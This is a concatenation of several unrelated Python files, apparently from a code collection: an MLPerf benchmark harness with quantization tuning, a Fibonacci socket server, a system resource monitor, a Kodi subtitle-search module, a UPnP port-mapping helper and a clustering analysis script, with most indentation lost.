parser.add_argument("--samples-per-query", type=int, help="mlperf multi-stream sample per query")
parser.add_argument('--benchmark', dest='benchmark', action='store_true',
help='run benchmark')
parser.add_argument('--int8', dest='int8', action='store_true', help='run benchmark')
parser.add_argument("--tuned_checkpoint", default='./saved_results', type=str, metavar='PATH',
help='path to checkpoint tuned by Neural Compressor (default: ./)')
args = parser.parse_args()
    # don't use defaults in argparse. Instead we default to a dict, override that with a profile
    # and take this as the default unless the command line gives an explicit value
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
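            # keep references to the response arrays so their buffers stay alive
            # until LoadGen has consumed them in QuerySamplesComplete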
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
                # None in the queue indicates the parent wants us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
return result["mAP"]
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
if count:
count_override = True
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, \
max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
log_output_settings = lg.LogOutputSettings()
log_output_settings.outdir = output_dir
log_output_settings.copy_summary_to_stdout = False
log_settings = lg.LogSettings()
log_settings.enable_trace = args.debug
log_settings.log_output = log_output_settings
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
settings.FromConfig(user_conf, args.model_name, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.benchmark:
settings.mode = lg.TestMode.PerformanceOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if count_override:
settings.min_query_count = count
settings.max_query_count = count
if args.samples_per_query:
settings.multi_stream_samples_per_query = args.samples_per_query
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
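    # Register the benchmark with LoadGen: the SUT wraps the enqueue/flush/latency
    # callbacks above, and the QSL describes the dataset (total item count, how many
    # samples are kept loaded at once - capped at 500 here - plus load/unload hooks).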
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 500), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
raw_model = runner.model.model
    # regexes used to pull the batch size and mean latency out of mlperf_log_summary.txt
    pattern = [r'samples_per_query : \d+', r'Mean latency.*']
def eval_func(model):
global last_timeing
runner.model.model = model
lg.StartTestWithLogSettings(sut, qsl, settings, log_settings)
if not last_timeing:
last_timeing = runner.result_timing
post_proc.finalize(result_dict, ds, output_dir=args.output)
accu = add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
print('Accuracy: %.3f ' % (accu))
return accu
def benchmark(model):
global last_timeing
runner.model.model = model
lg.StartTestWithLogSettings(sut, qsl, settings, log_settings)
if not last_timeing:
last_timeing = runner.result_timing
        file_path = os.path.join(args.output, 'mlperf_log_summary.txt')
        with open(file_path, 'r', encoding='UTF-8') as f:
            file_content = f.read()
regex_batch = re.compile(pattern[0])
regex_late = re.compile(pattern[1])
samples_per_query = int(regex_batch.findall(file_content)[0].split(': ')[1])
latency_per_sample = int(regex_late.findall(file_content)[0].split(': ')[1])
print('Batch size = %d' % samples_per_query)
print('Latency: %.3f ms' % (latency_per_sample / 10**6))
print('Throughput: %.3f samples/sec' % (10**9/latency_per_sample))
os.chdir(os.path.join(sys.path[0], ".."))
if args.tune:
# Quantization with Neural Compressor
from neural_compressor.experimental import Quantization, common
quantizer = Quantization("./conf.yaml")
quantizer.model = common.Model(raw_model)
quantizer.eval_func = eval_func
q_model = quantizer()
q_model.save(args.tuned_checkpoint)
elif args.int8:
from neural_compressor.utils.pytorch import load
int8_model = load(os.path.abspath(os.path.expanduser(args.tuned_checkpoint)), raw_model)
if args.accuracy:
eval_func(int8_model)
elif args.benchmark:
benchmark(int8_model)
else:
if args.accuracy:
eval_func(raw_model)
elif args.benchmark:
benchmark(raw_model)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
server.py
|
import socket
import threading
def fib(n):
if n <= 2:
return 1
return fib(n - 1) + fib(n - 2)
def fib_server(address):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(address)
sock.listen(5)
while True:
client, addr = sock.accept()
print(f"Connection from {addr}")
fib_handler(client)
def fib_server_threaded(address):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(address)
sock.listen(5)
while True:
client, addr = sock.accept()
print(f"Connection from {addr}")
threading.Thread(target=fib_handler, args=(client,)).start()
def fib_handler(sock):
while True:
req = sock.recv(100).strip()
if not req:
break
n = int(req)
result = fib(n)
resp = f"{result}\n".encode("utf-8")
sock.send(resp)
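# Minimal client sketch (illustrative, not part of the original module):
# send one ASCII integer and read back the line produced by fib_handler above.
def fib_client(n, address=("localhost", 25000)):
    with socket.create_connection(address) as sock:
        sock.sendall(f"{n}\n".encode("utf-8"))
        return int(sock.recv(100).strip())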
if __name__ == "__main__":
address = ("", 25000)
# fib_server(address)
fib_server_threaded(address)
|
resource_monitoring.py
|
# -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/9/18 0018 10:29
import datetime
import json
import socket
import sys
import threading
import time
import psutil
from function_scheduling_distributed_framework.utils import LoggerLevelSetterMixin, LoggerMixin, decorators
from function_scheduling_distributed_framework.utils.mongo_util import MongoMixin
"""
# psutil.virtual_memory()
svmem = namedtuple(
'svmem', ['total', 'available', 'percent', 'used', 'free',
'active', 'inactive', 'buffers', 'cached', 'shared', 'slab'])
# psutil.disk_io_counters()
sdiskio = namedtuple(
'sdiskio', ['read_count', 'write_count',
'read_bytes', 'write_bytes',
'read_time', 'write_time',
'read_merged_count', 'write_merged_count',
'busy_time'])
# psutil.Process().open_files()
popenfile = namedtuple(
'popenfile', ['path', 'fd', 'position', 'mode', 'flags'])
# psutil.Process().memory_info()
pmem = namedtuple('pmem', 'rss vms shared text lib data dirty')
# psutil.Process().memory_full_info()
pfullmem = namedtuple('pfullmem', pmem._fields + ('uss', 'pss', 'swap'))
# psutil.Process().memory_maps(grouped=True)
pmmap_grouped = namedtuple(
'pmmap_grouped',
['path', 'rss', 'size', 'pss', 'shared_clean', 'shared_dirty',
'private_clean', 'private_dirty', 'referenced', 'anonymous', 'swap'])
# psutil.Process().memory_maps(grouped=False)
pmmap_ext = namedtuple(
'pmmap_ext', 'addr perms ' + ' '.join(pmmap_grouped._fields))
# psutil.Process.io_counters()
pio = namedtuple('pio', ['read_count', 'write_count',
'read_bytes', 'write_bytes',
'read_chars', 'write_chars'])
p = psutil.Process()
print(p)
print(p.memory_info()[0])
print(p.cpu_percent(interval=1))
print(p.cpu_percent(interval=1))
print(psutil.cpu_percent(1,percpu=True))
print(psutil.virtual_memory())
"""
class ResourceMonitor(LoggerMixin, LoggerLevelSetterMixin, MongoMixin):
# ResourceMonitor(is_save_info_to_mongo=True).set_log_level(20).start_build_info_loop_on_daemon_thread(60)
cpu_count = psutil.cpu_count()
host_name = socket.gethostname()
def __init__(self, process=psutil.Process(), is_save_info_to_mongo=False, mongo_col='default'):
self.process = process
self.logger.setLevel(20)
self.all_info = {}
self._is_save_info_to_mongo = is_save_info_to_mongo
self._mongo_col = mongo_col
@staticmethod
def divide_1m(value):
return round(value / (1024 * 1024), 2)
def get_current_process_memory(self) -> float:
result = self.process.memory_info()
self.logger.debug(result)
return self.divide_1m(result[0])
def get_current_process_cpu(self):
result = self.process.cpu_percent(interval=1)
self.logger.debug(result)
return result
def get_os_cpu_percpu(self):
result = psutil.cpu_percent(1, percpu=True)
self.logger.debug(result)
return result
def get_os_cpu_totalcpu(self):
result = round(psutil.cpu_percent(1, percpu=False) * self.cpu_count, 2)
self.logger.debug(result)
return result
def get_os_cpu_avaragecpu(self):
result = psutil.cpu_percent(1, percpu=False)
self.logger.debug(result)
return result
def get_os_virtual_memory(self) -> dict:
memory_tuple = psutil.virtual_memory()
self.logger.debug(memory_tuple)
return {
'total': self.divide_1m(memory_tuple[0]),
'available': self.divide_1m(memory_tuple[1]),
'used': self.divide_1m(memory_tuple[3]),
}
def get_os_net_info(self):
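        # sample the NIC counters twice, one second apart, so the deltas below
        # approximate per-second throughput (byte counts are converted to MB,
        # packet counts are left as-is)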
result1 = psutil.net_io_counters(pernic=False)
time.sleep(1)
result2 = psutil.net_io_counters(pernic=False)
speed_dict = dict()
speed_dict['up_speed'] = self.divide_1m(result2[0] - result1[0])
speed_dict['down_speed'] = self.divide_1m(result2[1] - result1[1])
speed_dict['packet_sent_speed'] = result2[2] - result1[2]
speed_dict['packet_recv_speed'] = result2[3] - result1[3]
self.logger.debug(result1)
return speed_dict
def get_all_info(self):
self.all_info = {
'host_name': self.host_name,
'process_id': self.process.pid,
'process_name': self.process.name(),
'process_script': sys.argv[0],
'memory': self.get_current_process_memory(),
'cpu': self.get_current_process_cpu(),
'os_memory': self.get_os_virtual_memory(),
'os_cpu': {'cpu_count': self.cpu_count, 'total_cpu': self.get_os_cpu_totalcpu(), 'avarage_cpu': self.get_os_cpu_avaragecpu()},
'net_info': self.get_os_net_info()
}
# nb_print(json.dumps(self.all_info,indent=4))
self.logger.info(json.dumps(self.all_info, indent=4))
if self._is_save_info_to_mongo:
self.all_info.update({'update_time': datetime.datetime.now()})
self.mongo_client.get_database('process_info').get_collection(self._mongo_col).insert_one(self.all_info)
return self.all_info
def start_build_info_loop(self, interval=60, ):
decorators.keep_circulating(interval)(self.get_all_info)()
def start_build_info_loop_on_daemon_thread(self, interval=60, ):
threading.Thread(target=self.start_build_info_loop, args=(interval,), daemon=True).start()
|
search.py
|
# -*- coding: utf-8 -*-
def __auth_service(core, service_name, request):
service = core.services[service_name]
response = core.request.execute(core, request)
if response.status_code == 200 and response.text:
service.parse_auth_response(core, service_name, response.text)
def __query_service(core, service_name, meta, request, results):
try:
service = core.services[service_name]
response = core.request.execute(core, request)
if response and response.status_code == 200 and response.text:
service_results = service.parse_search_response(core, service_name, meta, response)
else:
service_results = []
results.extend(service_results)
core.logger.debug(lambda: core.json.dumps({
'url': request['url'],
'count': len(service_results),
'status_code': response.status_code
}, indent=2))
finally:
core.progress_text = core.progress_text.replace(service.display_name, '')
core.kodi.update_progress(core)
def __add_results(core, results): # pragma: no cover
listitems = []
dualsub_enable = core.kodi.addon.getSetting('dualsub_enable') == 'true'
    if dualsub_enable:
        results = [item for item in results if item['name'].lower().endswith('.srt')]
for item in results:
listitem = core.kodi.create_listitem(item)
action_args = core.utils.quote_plus(core.json.dumps(item['action_args']))
listitems.append(listitem)
        if not dualsub_enable:
core.kodi.xbmcplugin.addDirectoryItem(
handle=core.handle,
listitem=listitem,
isFolder=False,
url='plugin://%s/?action=download&service_name=%s&action_args=%s'
% (core.kodi.addon_id, item['service_name'], action_args)
)
    if dualsub_enable:
dialog = core.kodi.xbmcgui.Dialog()
while True:
ret = dialog.multiselect(core.kodi.addon.getLocalizedString(32027), [i for i in listitems],useDetails=True)
if ret and len(ret) > 2:
dialog.ok('', core.kodi.addon.getLocalizedString(32028))
else:
break
if ret and len(ret) > 0:
subs=[]
for sub in ret:
action_args = core.json.dumps(results[sub]['action_args'])
subs.append({'service_name':results[sub]['service_name'], 'action_args':action_args})
payload=core.json.dumps(subs[:2])
payload=core.utils.quote(payload)
listitem = core.kodi.xbmcgui.ListItem(label2=core.kodi.addon.getLocalizedString(32019))
url = "plugin://%s/?action=download&payload=%s" % (core.kodi.addon_id,payload)
core.kodi.xbmcplugin.addDirectoryItem(handle=core.handle,url=url,listitem=listitem,isFolder=False)
listitem = core.kodi.xbmcgui.ListItem(label2=core.kodi.addon.getLocalizedString(32026))
url = "plugin://%s/?action=downloadswap&payload=%s" % (core.kodi.addon_id,payload)
core.kodi.xbmcplugin.addDirectoryItem(handle=core.handle,url=url,listitem=listitem,isFolder=False)
def __has_results(service_name, results):
return any(map(lambda r: r['service_name'] == service_name, results))
def __save_results(core, meta, results):
try:
if len(results) == 0:
return
meta_hash = core.cache.get_meta_hash(meta)
json_data = core.json.dumps({
'hash': meta_hash,
'timestamp': core.time.time(),
'results': results
}, indent=2)
with open(core.cache.results_filepath, 'w') as f:
f.write(json_data)
except:
import traceback
traceback.print_exc()
def __get_last_results(core, meta):
force_search = []
try:
with open(core.cache.results_filepath, 'r') as f:
last_results = core.json.loads(f.read())
meta_hash = core.cache.get_meta_hash(meta)
if last_results['hash'] != meta_hash:
return ([], [])
has_bsplayer_results = __has_results('bsplayer', last_results['results'])
has_bsplayer_results_expired = core.time.time() - last_results['timestamp'] > 3 * 60
if has_bsplayer_results and has_bsplayer_results_expired:
last_results['results'] = list(filter(lambda r: r['service_name'] != 'bsplayer', last_results['results']))
force_search.append('bsplayer')
return (last_results['results'], force_search)
except: pass
return ([], [])
def __sanitize_results(core, meta, results):
temp_dict = {}
for result in results:
temp_dict[result['action_args']['url']] = result
try:
if result['sync'] == 'true':
ext = core.os.path.splitext(result['name'])[1]
result['name'] = '%s%s' % (meta.filename_without_ext, ext)
except: pass
result['name'] = core.utils.unquote(result['name'])
return list(temp_dict.values())
def __apply_language_filter(meta, results):
return list(filter(lambda x: x['lang'] in meta.languages, results))
def __apply_limit(core, all_results, meta):
limit = core.kodi.get_int_setting('general.results_limit')
lang_limit = int(limit / len(meta.languages))
if lang_limit * len(meta.languages) < limit:
lang_limit += 1
results = []
for lang in meta.languages:
lang_results = list(filter(lambda x: x['lang'] == lang, all_results))
if len(lang_results) < lang_limit:
lang_limit += lang_limit - len(lang_results)
results.extend(lang_results[:lang_limit])
return results[:limit]
def __prepare_results(core, meta, results):
results = __apply_language_filter(meta, results)
results = __sanitize_results(core, meta, results)
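    # sort priority: preferred language first, then language order, synced subtitles,
    # filename similarity (best match first), rating (highest first), the
    # hearing-impaired flag (flagged first), and finally service name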
sorter = lambda x: (
not x['lang'] == meta.preferredlanguage,
meta.languages.index(x['lang']),
not x['sync'] == 'true',
-core.difflib.SequenceMatcher(None, x['name'].lower(), meta.filename).ratio(),
-x['rating'],
not x['impaired'] == 'true',
x['service'],
)
results = sorted(results, key=sorter)
results = __apply_limit(core, results, meta)
results = sorted(results, key=sorter)
return results
def __parse_languages(core, languages):
return list({language for language in (core.kodi.parse_language(x) for x in languages) if language is not None})
def __chain_auth_and_search_threads(core, auth_thread, search_thread):
auth_thread.start()
auth_thread.join()
search_thread.start()
search_thread.join()
def __wait_threads(core, request_threads):
threads = []
for (auth_thread, search_thread) in request_threads:
if not auth_thread:
threads.append(search_thread)
else:
thread = core.threading.Thread(target=__chain_auth_and_search_threads, args=(core, auth_thread, search_thread))
threads.append(thread)
core.utils.wait_threads(threads)
def __complete_search(core, results):
if core.api_mode_enabled:
return results
__add_results(core, results) # pragma: no cover
def __search(core, service_name, meta, results):
service = core.services[service_name]
requests = service.build_search_requests(core, service_name, meta)
core.logger.debug(lambda: '%s - %s' % (service_name, core.json.dumps(requests, default=lambda o: '', indent=2)))
threads = []
for request in requests:
thread = core.threading.Thread(target=__query_service, args=(core, service_name, meta, request, results))
threads.append(thread)
core.utils.wait_threads(threads)
def search(core, params):
meta = core.video.get_meta(core)
meta.languages = __parse_languages(core, core.utils.unquote(params['languages']).split(','))
meta.preferredlanguage = core.kodi.parse_language(params['preferredlanguage'])
core.logger.debug(lambda: core.json.dumps(meta, default=lambda o: '', indent=2))
if meta.imdb_id == '':
core.logger.error('missing imdb id!')
core.kodi.notification('IMDB ID is not provided')
return
threads = []
(results, force_search) = __get_last_results(core, meta)
for service_name in core.services:
if len(results) > 0 and (__has_results(service_name, results) or service_name not in force_search):
continue
if not core.kodi.get_bool_setting(service_name, 'enabled'):
continue
service = core.services[service_name]
core.progress_text += service.display_name + '|'
auth_thread = None
auth_request = service.build_auth_request(core, service_name)
if auth_request:
auth_thread = core.threading.Thread(target=__auth_service, args=(core, service_name, auth_request))
search_thread = core.threading.Thread(target=__search, args=(core, service_name, meta, results))
threads.append((auth_thread, search_thread))
if len(threads) == 0:
return __complete_search(core, results)
core.progress_text = core.progress_text[:-1]
core.kodi.update_progress(core)
ready_queue = core.utils.queue.Queue()
cancellation_token = lambda: None
cancellation_token.iscanceled = False
def check_cancellation(): # pragma: no cover
dialog = core.progress_dialog
while (core.progress_dialog is not None and not cancellation_token.iscanceled):
if not dialog.iscanceled():
core.time.sleep(1)
continue
cancellation_token.iscanceled = True
final_results = __prepare_results(core, meta, results)
ready_queue.put(__complete_search(core, final_results))
break
def wait_all_results():
__wait_threads(core, threads)
if cancellation_token.iscanceled:
return
final_results = __prepare_results(core, meta, results)
__save_results(core, meta, final_results)
ready_queue.put(__complete_search(core, final_results))
core.threading.Thread(target=check_cancellation).start()
core.threading.Thread(target=wait_all_results).start()
return ready_queue.get()
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "cryptodoge", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run cryptodoge, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join(5)
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
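# Usage sketch (illustrative, not part of the original module); the port number is
# an arbitrary example. remap/release/shutdown only enqueue messages for the
# background worker thread created in __init__.
def _example_upnp_usage(port=8444):
    upnp = UPnP()
    upnp.remap(port)        # ask the worker to forward `port` on the gateway
    try:
        pass                # the application would run here
    finally:
        upnp.release(port)  # remove the port mapping
        upnp.shutdown()     # stop the worker thread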
|
vowel-analysis.py
|
# source: https://github.com/joshuamorton/Machine-Learning/blob/master/P3/analysis.py
# source: https://github.com/iRapha/CS4641/blob/master/P3/analysis.py
import argparse
from pprint import pprint
from StringIO import StringIO
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans as KM
from sklearn.decomposition import FastICA as ICA
from sklearn.decomposition.pca import PCA as PCA
from sklearn.feature_selection import SelectKBest as best
from sklearn.feature_selection import f_classif
from sklearn.mixture import GMM as EM
from sklearn.random_projection import GaussianRandomProjection as RandomProjection
from sknn.mlp import Classifier, Layer
import data_util as util
def plot(axes, values, x_label, y_label, title, name):
print "plot" + title + name
plt.clf()
plt.plot(*values)
plt.axis(axes)
plt.title(title)
plt.ylabel(y_label)
plt.xlabel(x_label)
plt.savefig("plots/v/"+name+".png", dpi=500)
# plt.show()
plt.clf()
def pca(tx, ty, rx, ry):
print "pca"
compressor = PCA(n_components = tx[1].size/2)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wPCAtr")
km(newtx, ty, newrx, ry, add="wPCAtr")
nn(newtx, ty, newrx, ry, add="wPCAtr")
print "pca done"
def ica(tx, ty, rx, ry):
print "ica"
compressor = ICA(whiten=True) # for some people, whiten needs to be off
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wICAtr")
km(newtx, ty, newrx, ry, add="wICAtr")
nn(newtx, ty, newrx, ry, add="wICAtr")
print "ica done"
def randproj(tx, ty, rx, ry):
print "randproj"
compressor = RandomProjection(tx[1].size)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
# compressor = RandomProjection(tx[1].size)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wRPtr")
km(newtx, ty, newrx, ry, add="wRPtr")
nn(newtx, ty, newrx, ry, add="wRPtr")
print "randproj done"
def kbest(tx, ty, rx, ry):
print "kbest"
for i in range(9):
k = i + 1
add = "wKBtr" + str(k)
compressor = best(f_classif, k=k)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add=add)
km(newtx, ty, newrx, ry, add=add)
nn(newtx, ty, newrx, ry, add=add)
print "kbest done"
def em(tx, ty, rx, ry, add="", times=10):
print "em" + add
errs = []
# this is what we will compare to
checker = EM(n_components=2)
checker.fit(rx)
truth = checker.predict(rx)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
# create a clusterer
clf = EM(n_components=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
# here we make the arguably awful assumption that for a given cluster,
        # all values in that cluster "should", in a perfect world, belong in one
# class or the other, meaning that say, cluster "3" should really be
# all 0s in our truth, or all 1s there
#
# So clusters is a dict of lists, where each list contains all items
# in a single cluster
for index, val in enumerate(result):
clusters[val].append(index)
# then we take each cluster, find the sum of that clusters counterparts
# in our "truth" and round that to find out if that cluster should be
# a 1 or a 0
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
# the processed list holds the results of this, so if cluster 3 was
# found to be of value 1,
# for each value in clusters[3], processed[value] == 1 would hold
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "Expectation Maximization Error", "EM"+add)
    # reshape the 1-D cluster assignments into column vectors so they can be
    # appended to the feature matrices below as an extra feature
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onEM"+add)
print "em done" + add
def km(tx, ty, rx, ry, add="", times=10):
print "km"
#this does the exact same thing as the above
